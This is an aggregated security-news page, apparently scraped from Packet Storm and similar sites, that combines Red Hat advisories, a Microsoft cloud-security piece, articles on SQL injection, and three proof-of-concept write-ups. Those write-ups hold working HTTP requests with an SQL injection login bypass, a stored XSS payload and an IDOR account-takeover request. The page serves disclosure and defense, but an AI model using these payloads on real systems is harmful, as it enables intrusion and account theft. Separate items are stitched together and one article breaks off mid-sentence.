Red Hat Security Advisory 2024-1686-03 - A new image is available for Red Hat Single Sign-On 7.6.7, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Issues addressed include an information leakage vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1686.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat Single Sign-On 7.6.7 for OpenShift image security update  
Advisory ID:        RHSA-2024:1686-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1686  
Issue date:         2024-04-05  
Revision:           03  
CVE Names:          CVE-2020-28241  
====================================================================

Summary: 

A new image is available for Red Hat Single Sign-On 7.6.7, running on OpenShift Container Platform 3.10 and 3.11, and 4.3.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The rh-sso-7/sso76-openshift-rhel8 container image has been updated for RHEL-8 based Middleware Containers to address the following security advisory: RHSA-2023:5837 (see References)

Users of rh-sso-7/sso76-openshift-rhel8 container images are advised to upgrade to these updated images, which contain backported patches to correct these security issues, fix these bugs and add these enhancements. Users of these images are also encouraged to rebuild all container images that depend on these images.

Security Fix(es):

* pgjdbc: PostgreSQL JDBC Driver allows attacker to inject SQL if using PreferQueryMode=SIMPLE (CVE-2024-1597)

* libmaxminddb: improper initialization in dump_entry_data_list() in maxminddb.c (CVE-2020-28241)

* nss: vulnerable to Minerva side-channel information leak (CVE-2023-6135)

You can find images updated by this advisory in Red Hat Container Catalog (see References).

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-28241

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/errata/RHSA-2023:5837  
https://catalog.redhat.com/software/containers/registry/registry.access.redhat.com/repository/rh-sso-7/sso76-openshift-rhel8  
https://bugzilla.redhat.com/show_bug.cgi?id=1895379  
https://bugzilla.redhat.com/show_bug.cgi?id=2249906  
https://bugzilla.redhat.com/show_bug.cgi?id=2266523

Red Hat Security Advisory 2024-1686-03

Cloud-native application protection platforms (CNAPPs) sidestep siloed security and embed security into the earliest stages of application development.

Source: John Williams RF via Alamy

Multicloud security is an enormously complex undertaking, requiring security teams to correlate thousands of daily security alerts across disparate platforms to efficiently and accurately respond to emergent threats. Rather than relying on a series of third-party point solutions — which often struggle to integrate and communicate with one another — to protect your multicloud environment, we recommend prioritizing native security solutions that can embed seamlessly within your environment.

A cloud-native application protection platform (CNAPP) is a unified platform that simplifies securing cloud applications throughout their life cycles. Originally coined by Gartner, this all-in-one platform connects traditionally siloed security and compliance capabilities into a single user interface. At their core, CNAPPs allow security teams to embed security into the earliest stages of the application development process and deploy more robust protections for cloud workloads and data.

There are many use cases where a cloud-native solution will have a natural edge over third-party solutions. We have picked a few common scenarios to showcase capabilities that are hard to replicate with a customized or third-party solution. This list is meant to be representative, not exhaustive.

**1\. Monitoring Your Cloud Management Layer**

The cloud management layer is a crucial service connected to all of your cloud resources. That also makes it a potential target for attackers. Consequently, we recommend security operations teams monitor the resource management layer closely.

Since cloud service providers (CSPs) do not allow integration with this layer, the capabilities provided by third-party solutions are severely limited and rely solely on the availability of logs/events, like Azure Diagnostics and AWS CloudTrail.

**2\. Detecting Near Real-Time Threats With Zero or Minimal Impact on Workloads**

As you leverage more native architecture patterns, your usage of native storage, like object storage and native SQL, will grow. As a result, these services often represent an attack target.

Because CSPs do not allow native integration with these services, organizations often struggle to detect malware as soon as an object is uploaded to a storage account without introducing latency or further risks to their workloads. We also see this same issue present when trying to detect sensitive data across databases and object stores without allowing access to a third-party solution. Native cloud security offerings do not have these limitations.

**3\. Inherent Coverage of Workloads as You Scale or Modernize**

Native solutions are deployed at the account or subscription level, integrate natively with other cloud services, and cover a vast variety of usage patterns. Often, these solutions do not require any agent and are push-button. When cloud architecture teams decide to migrate from a virtual machine-based deployment to one that's container-based, organizations can rest assured that the workload is protected from the start.

**4\. Integrating with Your Native Pipelines**

When organizations deploy cloud workloads, they can integrate the native solution at the code repository level. This ensures they are checking appropriate risks at each level — for example, code scanning as part of code merges or image scanning on push. Native solutions also allow organizations to manifest validation before container deployment.

**5\. Maintaining Your Access-Related Blast Radius**

When organizations deploy a third-party solution, that solution requires its own set of roles that need to be monitored. Users will also most likely need to be managed within the third-party solution itself. This adds additional monitoring requirements for security teams that are not needed when deploying native solutions. Because native solutions already integrate with other cloud services and leverage predefined roles, security teams don't need to worry about any additional risks being introduced into their environments.

As we have seen, CNAPPs have a unique value proposition for integrating in your cloud security portfolio, either as the primary solution or as a complement to your existing cloud security posture management (CSPM).

— Read more Partner Perspectives from Microsoft Security

**About the Author(s)**

Microsoft

Protect it all with Microsoft Security.

Microsoft offers simplified, comprehensive protection and expertise that eliminates security gaps so you can innovate and grow in a changing world. Our integrated security, compliance, and identity solutions work across platforms and cloud environments, providing protection without compromising productivity.

We help customers simplify the complex by prioritizing risks with unified management tools and strategic guidance created to maximize the human expertise inside your company. Our unparalleled AI is informed by trillions of signals so you can detect threats quickly, respond effectively, and fortify your security posture to stay ahead of ever-evolving threats.

Reconsider Your CNAPP Strategy Using These 5 Scenarios

A researcher received a $5,500 bug bounty for discovering a vulnerability (CVE-2024-2879) in LayerSlider, a plug-in with more than a million active installations.

Source: Primakov via Shutterstock

Attackers can exploit a critical SQL injection vulnerability found in a widely used WordPress plug-in to compromise more than 1 million sites and extract sensitive data such as password hashes from associated databases.

A security researcher called AmrAwad (aka 1337\_Wannabe) discovered the bug in the LayerSlider, a plug-in for creating animated Web content. The security flaw, tracked as CVE-2024-2879, has a rating of 9.8 out of 10 on the CVSS 3.0 vulnerability-severity scale, and is associated with the "ls\_get\_popup\_markup" action in versions 7.9.11 and 7.10.0 of LayerSlider. The vulnerability is due to "insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query," according to Wordfence.

"This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database," the company said.

Wordfence awarded the researcher a bounty of $5,500 — the company's highest bounty to date — for the discovery, according to a blog post by Wordfence. AmrAwad's March 25 submission came as part of Wordfence's second Bug Bounty Extravaganza, and the company contacted the Kreatura Team, developers of the plug-in, the same day to notify them of the flaw. The team responded the next day and delivered a patch in version 7.10.1 of LayerSlider on March 27.

**Exploiting the LayerSlider SQL Injection Flaw**

The potential for exploitation of the vulnerability lies in the insecure implementation of the LayerSlider plug-in's slider popup markup query functionality, which has an "id" parameter, according to Wordfence.

According to the firm, "if the 'id' parameter is not a number, it is passed without sanitization to the find() function in the LS\_Sliders class," which "queries the sliders in a way that constructs a statement without the prepare() function."  

Since that function would "parameterize and escape the SQL query for safe execution in WordPress, thereby providing protection against SQL injection attacks," its absence creates a vulnerable scenario, according to Wordfence.

However, to exploit the flaw requires a "a time-based blind approach" on the part of attackers to extract database information, which is "an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities," according to Wordfence.

"This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database," the company explained.

**Secure WordPress, Secure the Web**

Vulnerable WordPress sites are a popular target for attackers given the content management system's widespread use across the Internet, and often vulnerabilities exist in plug-ins that independent developers create for adding functionality to sites using the platform.

Indeed, at least 43% of websites on the entire Internet use WordPress to power their sites, e-commerce applications, and communities. Further, the wealth of sensitive data such as user passwords and payment info often stored within their pages represents a significant opportunity for threat actors who seek to misuse it.

Making "the WordPress ecosystem more secure ... ultimately makes the entire web more secure," WordPress noted.

Wordfence advised that WordPress users with LayerSlider installed on sites verify immediately that they are updated to the latest, patched version of the plug-in to ensure it isn't vulnerable to exploit.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Critical Security Flaw Exposes 1 Million WordPress Sites to SQL Injection

User Registration and Login and User Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: User Registration & Login and User Management System v3.2 - SQL Injection (Unauthenticated)# Exploit Author: Yusuf DİNÇ# Google Dork: NA# Date: 05/03/2024# Vendor Homepage: https://phpgurukul.com# Software Link:https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.2# Tested on: LinuxPOST /test/loginsystem/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 53Origin: http://localhostConnection: closeReferer: http://localhost/test/loginsystem/login.phpCookie: csrftoken=WYNmntI3xnkUlg89ElNUCBp6mFVAZel8; sessionid=t5apbvw2jdnur3uvudxt8mcn7cdudbi5; PHPSESSID=1mnimk5b1591oukpi0kh90n0hvUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1uemail=test%40gmail.com'+OR+1=1#&password=test&login=

User Registration And Login And User Management System 3.2 SQL Injection

Red Hat Security Advisory 2024-1662-03 - An update is now available for Red Hat build of Quarkus. Issues addressed include denial of service, information leakage, and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1662.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat build of Quarkus 3.2.11 release and security update  
Advisory ID:        RHSA-2024:1662-03  
Product:            Red Hat build of Quarkus  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1662  
Issue date:         2024-04-03  
Revision:           03  
CVE Names:          CVE-2024-1023  
====================================================================

Summary: 

An update is now available for Red Hat build of Quarkus.

Red Hat Product Security has rated this update as having a security impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a  
detailed severity rating, is available for each vulnerability. For more  
information, see the CVE links in the References section.

Description:

This release of Red Hat build of Quarkus 3.2.11 includes security updates,  
bug fixes, and enhancements. For more information, see the release notes page  
listed in the References section.

Security Fix(es):

* CVE-2024-1597 org.postgresql/postgresql: pgjdbc: PostgreSQL JDBC Driver allows attacker to inject SQL if using PreferQueryMode=SIMPLE [quarkus-3.2]

* CVE-2024-1979 io.quarkus/quarkus-kubernetes-deployment: quarkus: information leak in annotation [quarkus-3.2]

* CVE-2024-1726 io.quarkus.resteasy.reactive/resteasy-reactive: quarkus: security checks for some inherited endpoints performed after serialization in RESTEasy Reactive may trigger a denial of service [quarkus-3.2]

* CVE-2024-25710 org.apache.commons/commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file [quarkus-3.2]

* CVE-2024-26308 org.apache.commons/commons-compress: OutOfMemoryError unpacking broken Pack200 file [quarkus-3.2]

* CVE-2024-1300 io.vertx/vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support [quarkus-3.2]

* CVE-2024-1023 io.vertx/vertx-core: memory leak due to the use of Netty FastThreadLocal data structures in Vertx [quarkus-3.2]

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1023

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_build_of_quarkus/3.2/  
https://access.redhat.com/articles/4966181  
https://bugzilla.redhat.com/show_bug.cgi?id=2260840  
https://bugzilla.redhat.com/show_bug.cgi?id=2263139  
https://bugzilla.redhat.com/show_bug.cgi?id=2264988  
https://bugzilla.redhat.com/show_bug.cgi?id=2264989  
https://bugzilla.redhat.com/show_bug.cgi?id=2265158  
https://bugzilla.redhat.com/show_bug.cgi?id=2266523  
https://bugzilla.redhat.com/show_bug.cgi?id=2266690  
https://issues.redhat.com/browse/QUARKUS-4022  
https://issues.redhat.com/browse/QUARKUS-4036  
https://issues.redhat.com/browse/QUARKUS-4097  
https://issues.redhat.com/browse/QUARKUS-4103  
https://issues.redhat.com/browse/QUARKUS-4104  
https://issues.redhat.com/browse/QUARKUS-4106

Red Hat Security Advisory 2024-1662-03

Red Hat Security Advisory 2024-1649-03 - An update for postgresql-jdbc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1649.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql-jdbc: security updateAdvisory ID:        RHSA-2024:1649-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1649Issue date:         2024-04-03Revision:           03CVE Names:          CVE-2024-1597====================================================================Summary: An update for postgresql-jdbc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system. Thepostgresql-jdbc package includes the .jar files needed for Java programs toaccess a PostgreSQL database.Security Fix(es):* pgjdbc: PostgreSQL JDBC Driver allows attacker to inject SQL if using PreferQueryMode=SIMPLE (CVE-2024-1597)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1597References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2266523

Red Hat Security Advisory 2024-1649-03

As part of its Secure by Design initiative, CISA urged companies to redouble efforts to quash SQL injection vulnerabilities. Here's how.

Source: Casimiro PT via Shutterstock

For more than a decade, injection vulnerabilities have literally topped the charts of critically dangerous software flaws, deemed more serious than all other types of vulnerabilities in the 2010, 2013, and 2017 Top 10 lists maintained by the Open Web Application Security Project (OWASP).

Still, the warnings have failed to weed out the issues. Last year, the Cl0p group stole data from companies using a previously unknown SQL injection (SQLi) vulnerability in MOVEit's file-transfer application. In late March, the Cybersecurity and Infrastructure Security Agency (CISA) called for companies to redouble their efforts to eliminate the security issue, which application security experts consider one of 13 different "unforgivable" classes of vulnerabilities that programmers should catch during development.

"Despite widespread knowledge and documentation of SQLi vulnerabilities over the past two decades, along with the availability of effective mitigations, software manufacturers continue to develop products with this defect, which puts many customers at risk," the agency stated in its March 25 advisory. "Vulnerabilities like SQLi have been considered by others an 'unforgivable' vulnerability since at least 2007."

The root of injection vulnerabilities is a lack of input sanitization; when the application receives variable input, there's always the risk of that input being tainted, says Randall Degges, head of developer relations at application security firm Snyk.

"Although this has been an issue since programming existed, the reason it’s still in the top 10 vulnerabilities after all this time is because there are an infinite number of ways to use input, and often time sanitizing input is tricky," he says.

For software developers looking to nix this particular issue, here's how.

**1\. Educate Yourself and Others**

The first step is always education. OWASP offers cheat sheets on SQLi, how to detect the vulnerability, and ways of creating safe code. Some Web application frameworks aim to educate developers while they are programming, using application programming interface (API) names to make the risk of some functions clear, such as React's "dangerouslySetInnerHTML" function, says James Kettle, director of research at PortSwigger, an application security testing firm.

In addition, developers should not necessarily trust the makers of open source software — especially components that have not been well vetted — to use safe code, and online tutorials are often unsafe as well, he says.

"I think the core issue is that there's a lot of unsafe APIs, where anyone using the API is vulnerable by default," Kettle says. "Even when there are more modern secure APIs available, fresh code is written using the unsafe versions, thanks to old unsafe examples in StackOverflow."

**2\. Harden the DevOps Pipeline Using Automated Tools**

Developers should implement unit tests to check code for SQLi flaws — and other common security issues — during development, add static application security testing (SAST) both prior to and after commits, and include scans for SQLi as part of dynamic application security testing (DAST).

Unit tests can be added using frameworks such as tSQLt for testing Microsoft SQL Server, pgTAP for testing applications that use PostgreSQL, and Pytest and SQLAlchemy for unit testing in Python programs. A variety of SQL unit testing best practices should be followed to make the tests more useful, such as isolating the SQL tests from dependencies and avoiding descriptive naming of the tests.

In addition to automated tests in the development pipeline, developers should make sure to use SQL frameworks, such as SQLAlchemy, because many security improvements are already baked in, says Snyk's Degges.

"Pretty much all modern SQL frameworks and tools provide convenience methods to help with this nowadays, so your best bet is to thoroughly read through the relevant framework documentation to ensure you're using it correctly when building queries," he says.

**3\. Play Around With SQLMap**

The open source program SQLMap is a great tool for penetration testers to experiment with SQLi, exploit any potential vulnerabilities, and dump a database to prove that the vulnerability can be exploited. The tool can also educate application developers to the true dangers of SQLi and how vulnerable code can be exploited.

However, the tool is not necessarily the best way to scan for potential vulnerabilities, says PortSwigger's Kettle.

"In my experience, the detection capabilities are slow, heavyweight, and prone to false positives," Kettle says. "Also, it can't explore websites to find the attack surface, which is one of the biggest challenges for finding these vulnerabilities automatically."

**4\. Consider a DAST Service**

Automating SQL injection scanning using DAST as part of the quality assurance stage — and even earlier in the DevOps pipeline, if possible — can help catch any overlooked vulnerabilities. In addition, DAST scanning is a good way to find SQLi in legacy code.

While Web application firewalls (WAFs) can prevent SQLi attacks from reaching an application, they should be used only as part of a defense-in-depth strategy, Kettle says.

"Personally, I've seen runtime protection like WAFs bypassed so many times that I don't have much confidence in them," he says. "I would recommend a bug-bounty program as an effective way to surface undetected vulnerabilities instead, and use WAFs as a last resort for systems that are in such a bad state that known vulnerabilities can't be patched."

**5\. Expand Beyond SQL**

Finally, companies should also look for other types of injection vulnerabilities and make sure their developers recognize risky patterns, since SQLi is only one class of injection vulnerabilities.

OWASP broadened the definition of an injection vulnerability to be any software flaw where user-supplied data is not validated or sanitized by an application and then sent to an interpreter. Cross-site scripting, SQL, operating system scripting, and parsing the Lightweight Directory Access Protocol (LDAP) are all areas that can be vulnerable to injection.

With the advent of artificial intelligence models, for instance, prompt injection is the latest form of an injection attack.

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

How to Tame SQL Injection

A critical security flaw impacting the LayerSlider plugin for WordPress could be abused to extract sensitive information from databases, such as password hashes.
The flaw, designated as CVE-2024-2879, carries a CVSS score of 9.8 out of a maximum of 10.0. It has been described as a case of SQL injection impacting versions from 7.9.11 through 7.10.0.
The issue has been addressed in version

Critical Security Flaw Found in Popular LayerSlider WordPress Plugin

Computer Laboratory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3140

# Vulnerable code section:

foreach($_POST as $k => $v){  
    $v = $this->conn->real_escape_string($v);  
    if(in_array($k, $main_field)){  
        if(!empty($data)) $data .= ", ";  
        $data .= " `{$k}` = '{$v}' ";  
    }  
}

- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

# Vulnerability Description:

- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571  
Content-Length: 946  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="id"

8  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="firstname"

staff2  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="middlename"

<script>alert(1)</script>  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="lastname"

asd  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="username"

staff  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="password"

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

-----------------------------381104392340117332004262429571--

- In this POST request, an attacker has included a script tag in the "middlename" field:

<script>alert(1)</script>

- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.

# Impact:

- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/xss_1.md  
https://vuldb.com/?id.258915  
https://www.cve.org/CVERecord?id=CVE-2024-3140

Computer Laboratory Management System 1.0 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3139

# Vulnerable code section:

if(!empty($_FILES['img']['tmp_name'])){  
    if(!is_dir(base_app."uploads/avatars"))  
        mkdir(base_app."uploads/avatars");  
    $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);  
    $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path  
    // Rest of the code  
}

# Vulnerability Description:

This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024  
Content-Length: 8393  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="id"

7  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="firstname"

testtt  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="middlename"

testMiddle   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="lastname"

te Last Name   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="username"

admin2  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="password"

qwe123  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="img"; filename="hack.png"  
Content-Type: image/png

PNG  
...

- Response:

HTTP/1.1 200 OK  
Date: Mon, 01 Apr 2024 10:19:19 GMT  
Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev  
X-Powered-By: PHP/8.2.0  
X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1  
Connection: close  
Content-Type: text/html; charset=UTF-8

1

# Impact:

This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md  
https://vuldb.com/?id.258914  
https://www.cve.org/CVERecord?id=CVE-2024-3139

Tag

#sql